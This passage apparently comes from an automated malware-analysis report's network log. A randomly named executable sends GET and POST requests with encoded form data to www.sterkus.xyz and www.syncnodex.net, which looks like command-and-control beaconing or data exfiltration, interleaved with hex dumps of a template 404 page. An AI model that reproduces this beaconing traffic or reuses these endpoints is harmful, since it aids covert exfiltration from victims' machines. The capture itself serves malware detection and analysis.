                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:06.336606026 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                                Sep 22, 2024 17:42:06.336620092 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                                Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                                Sep 22, 2024 17:42:06.336694002 CEST1236INData Raw: 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72
                                                                Data Ascii: s="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                                Sep 22, 2024 17:42:06.336707115 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">4
                                                                Sep 22, 2024 17:42:06.336806059 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                                Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                                Sep 22, 2024 17:42:06.336817980 CEST1236INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                                Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div>
                                                                Sep 22, 2024 17:42:06.336843014 CEST448INData Raw: 70 74 2d 35 20 6d 74 2d 35 20 77 6f 77 20 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79
                                                                Data Ascii: pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touc
                                                                Sep 22, 2024 17:42:06.336913109 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                                Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                                Sep 22, 2024 17:42:06.336922884 CEST224INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                                Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
                                                                Sep 22, 2024 17:42:06.341563940 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                                Data Ascii: <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4">


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.649738209.74.95.29804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:08.207600117 CEST419OUTGET /ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX61WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.sterkus.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:08.814095974 CEST1236INHTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:08 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:08.814115047 CEST1236INData Raw: 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c
                                                                Data Ascii: el="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -->
                                                                Sep 22, 2024 17:42:08.814127922 CEST448INData Raw: 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: </div> <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span
                                                                Sep 22, 2024 17:42:08.814208031 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a hr
                                                                Sep 22, 2024 17:42:08.814219952 CEST1236INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68
                                                                Data Ascii: </div> </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Property
                                                                Sep 22, 2024 17:42:08.814232111 CEST1236INData Raw: 66 6c 75 69 64 22 20 73 72 63 3d 22 69 6d 67 2f 68 65 61 64 65 72 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20
                                                                Data Ascii: fluid" src="img/header.jpg" alt=""> </div> </div> </div> ... Header End --> ... Search Start --> <div class="container-fluid bg-primary mb-5 wow fadeIn" data-wow-delay="0.
                                                                Sep 22, 2024 17:42:08.814244986 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 6c 65 63 74 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 73 65 6c 65 63 74 20 62 6f 72 64 65 72 2d 30 20 70 79 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <select class="form-select border-0 py-3"> <option selected>Location</option> <option value="1">Location 1</option>
                                                                Sep 22, 2024 17:42:08.814383030 CEST1236INData Raw: 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 34 22 3e 57 65 e2 80 99 72 65 20 73 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 68 61 76 65 20 6c 6f 6f 6b 65 64 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 69 6e
                                                                Data Ascii: <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try to use a search?</p> <a class="btn btn-primary py-3 px-5" href="">Go Back To Home</a>
                                                                Sep 22, 2024 17:42:08.814395905 CEST1236INData Raw: 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c 22 20 68 72 65 66 3d 22 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: ine-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></a> <a class="btn btn-outline-ligh
                                                                Sep 22, 2024 17:42:08.814409018 CEST1236INData Raw: 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-2.jpg"
                                                                Sep 22, 2024 17:42:08.819174051 CEST1236INData Raw: 73 6c 65 74 74 65 72 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 44 6f 6c 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73
                                                                Data Ascii: sletter</h5> <p>Dolor amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-cont


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.64973915.197.172.60804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:14.229240894 CEST686OUTPOST /xx1z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.syncnodex.net
                                                                Origin: http://www.syncnodex.net
                                                                Referer: http://www.syncnodex.net/xx1z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 51 2b 4e 7a 45 55 50 51 58 4c 2f 6c 47 31 54 4e 6a 35 66 51 68 65 7a 45 6e 38 54 35 2b 73 30 7a 50 4e 6a 71 4a 34 49 48 43 61 31 68 31 49 49 59 49 63 36 6b 49 38 48 35 70 6c 37 6b 45 35 75 2f 62 45 41 79 4c 74 36 64 65 41 47 33 30 48 39 76 72 67 70 42 7a 34 31 55 4c 37 46 71 72 77 65 4b 35 34 4d 32 58 47 66 5a 34 6e 78 4b 42 49 48 72 76 6f 6f 6b 56 63 54 79 75 64 4f 6b 63 64 57 6a 64 4d 70 33 6c 43 32 55 75 4e 73 46 7a 44 4c 51 4b 53 6e 2f 2b 44 34 44 77 72 63 4d 57 30 77 4f 6c 7a 43 75 6b 48 58 42 7a 7a 42 69 54 63 53 61 76 58 30 7a 6e 73 66 53 2b 50 66 4a 62 4f 54 2f
                                                                Data Ascii: i4fTbV=YSeb04MEpdQKQ+NzEUPQXL/lG1TNj5fQhezEn8T5+s0zPNjqJ4IHCa1h1IIYIc6kI8H5pl7kE5u/bEAyLt6deAG30H9vrgpBz41UL7FqrweK54M2XGfZ4nxKBIHrvookVcTyudOkcdWjdMp3lC2UuNsFzDLQKSn/+D4DwrcMW0wOlzCukHXBzzBiTcSavX0znsfS+PfJbOT/


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.64974015.197.172.60804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:16.850892067 CEST710OUTPOST /xx1z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.syncnodex.net
                                                                Origin: http://www.syncnodex.net
                                                                Referer: http://www.syncnodex.net/xx1z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 57 65 39 7a 43 7a 6a 51 57 72 2f 6d 61 6c 54 4e 71 5a 66 55 68 65 2f 45 6e 2f 66 70 2b 66 51 7a 42 50 37 71 49 36 67 48 42 61 31 68 36 6f 49 58 4d 63 36 2f 49 38 4b 45 70 6b 58 6b 45 35 36 2f 62 42 38 79 4c 61 75 65 65 51 47 31 79 48 39 74 76 67 70 42 7a 34 31 55 4c 37 42 55 72 77 47 4b 35 49 63 32 57 6e 66 47 32 48 78 46 47 49 48 72 72 6f 6f 67 56 63 54 51 75 59 6d 65 63 66 2b 6a 64 4e 5a 33 6b 58 61 54 6e 4e 73 44 39 6a 4b 54 47 48 53 75 78 6a 31 37 2f 72 55 71 4c 57 67 6b 67 46 44 30 34 30 58 69 68 6a 68 67 54 65 4b 6f 76 33 30 5a 6c 73 6e 53 73 59 54 75 55 36 32 63 72 38 42 68 2b 31 53 6d 6b 66 65 66 4e 2f 7a 75 70 53 6d 57 53 77 3d 3d
                                                                Data Ascii: i4fTbV=YSeb04MEpdQKWe9zCzjQWr/malTNqZfUhe/En/fp+fQzBP7qI6gHBa1h6oIXMc6/I8KEpkXkE56/bB8yLaueeQG1yH9tvgpBz41UL7BUrwGK5Ic2WnfG2HxFGIHrroogVcTQuYmecf+jdNZ3kXaTnNsD9jKTGHSuxj17/rUqLWgkgFD040XihjhgTeKov30ZlsnSsYTuU62cr8Bh+1SmkfefN/zupSmWSw==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.64974115.197.172.60804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:19.437231064 CEST1723OUTPOST /xx1z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.syncnodex.net
                                                                Origin: http://www.syncnodex.net
                                                                Referer: http://www.syncnodex.net/xx1z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 57 65 39 7a 43 7a 6a 51 57 72 2f 6d 61 6c 54 4e 71 5a 66 55 68 65 2f 45 6e 2f 66 70 2b 66 59 7a 42 2b 62 71 4a 62 67 48 41 61 31 68 6b 34 49 55 4d 63 37 39 49 38 53 41 70 6b 72 30 45 37 43 2f 61 6a 45 79 4a 75 43 65 52 51 47 31 77 48 39 73 72 67 6f 42 7a 34 6b 66 4c 37 78 55 72 77 47 4b 35 4f 51 32 52 32 66 47 30 48 78 4b 42 49 47 35 76 6f 6f 59 56 63 62 71 75 59 71 4f 63 75 65 6a 64 74 4a 33 6a 6c 69 54 73 4e 73 42 77 44 4b 78 47 48 58 32 78 6a 70 42 2f 6f 49 55 4c 57 45 6b 6b 51 6d 76 67 6e 6e 50 33 51 4e 73 44 74 69 34 6d 67 42 73 6c 64 54 65 73 65 48 35 4c 65 7a 77 73 70 6b 38 38 57 54 6c 76 76 57 50 56 6f 4b 6e 39 53 2b 66 47 77 78 36 66 65 70 42 2b 54 59 71 65 77 35 58 75 76 31 74 69 61 4c 6d 6a 51 31 37 61 61 71 30 43 6f 45 4f 6e 72 51 44 6f 4d 70 2b 58 62 75 2b 32 6d 65 45 78 65 74 43 50 62 68 43 75 76 62 67 5a 56 67 76 78 78 56 6c 52 47 34 49 35 58 74 74 77 4d 4e 75 45 68 38 52 51 6a 53 4d 78 4d 68 4e 64 77 66 47 57 51 42 67 6c 30 76 [TRUNCATED]
                                                                Data Ascii: i4fTbV=YSeb04MEpdQKWe9zCzjQWr/malTNqZfUhe/En/fp+fYzB+bqJbgHAa1hk4IUMc79I8SApkr0E7C/ajEyJuCeRQG1wH9srgoBz4kfL7xUrwGK5OQ2R2fG0HxKBIG5vooYVcbquYqOcuejdtJ3jliTsNsBwDKxGHX2xjpB/oIULWEkkQmvgnnP3QNsDti4mgBsldTeseH5Lezwspk88WTlvvWPVoKn9S+fGwx6fepB+TYqew5Xuv1tiaLmjQ17aaq0CoEOnrQDoMp+Xbu+2meExetCPbhCuvbgZVgvxxVlRG4I5XttwMNuEh8RQjSMxMhNdwfGWQBgl0v+0IpU0DNzn+BUY/1ji19DAzk36wcA10MGdnex6FAhCRVsbnHMGR+ypIdp6hekXLJnDI4h4Rw4SoHe8v33ijd/3FxlGOo1CMleI66Rx68Imw9uJ4hOZsiSZtIY0xHwoODiPs+4ThRYb3huUqisHAcasRl0jVLROx0JiZCvSiqGIE5a8qh0+4VlUfzN55cw18TTJp+OeH2RuvHX5zNKWFyGdE54QrDs4kZvNdpfthGkviquy6ASnCrahSthUVitKUhzzORed9af06gY7Gs+gLmYFxaOZhIXZZMuvWXQ4v4UK9qBZ0MfcHeu7ZXdTbE9diKSjl0duhIbRcHDLc9JT3ScQtlZA2iQlhj5qD2TPmvTW0EI4Ct2W2Y0h7QHvhUzB5XDw4VQkE0c2nwniMmuSFlAccllU2VlqcLUDe8eKd81tFQ1CKS3ohgRJuVil0+QNUX01Lk+sT54oKy1o0cUc+juRRAjmE1agp8fQh3FcteIQGx1GeR9VgDNWXqSaEeFiIh41JMCuJyLbMAI6bF5K4xzksgJJSEvP8bY6I9Icb18hI8Yrtd3zQupAfNwz/TbFhMMWZ5s0AesqjUVm0b5qZAK0T5ECLjupe4DhfuCmcf692ikzfVq8WY9287HuUex82qqo/QR6jaM8zDdKgbNCoCbCh0YZBq+MXFMN [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.64974215.197.172.60804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:21.986989021 CEST421OUTGET /xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.syncnodex.net
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:22.448048115 CEST407INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:42:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
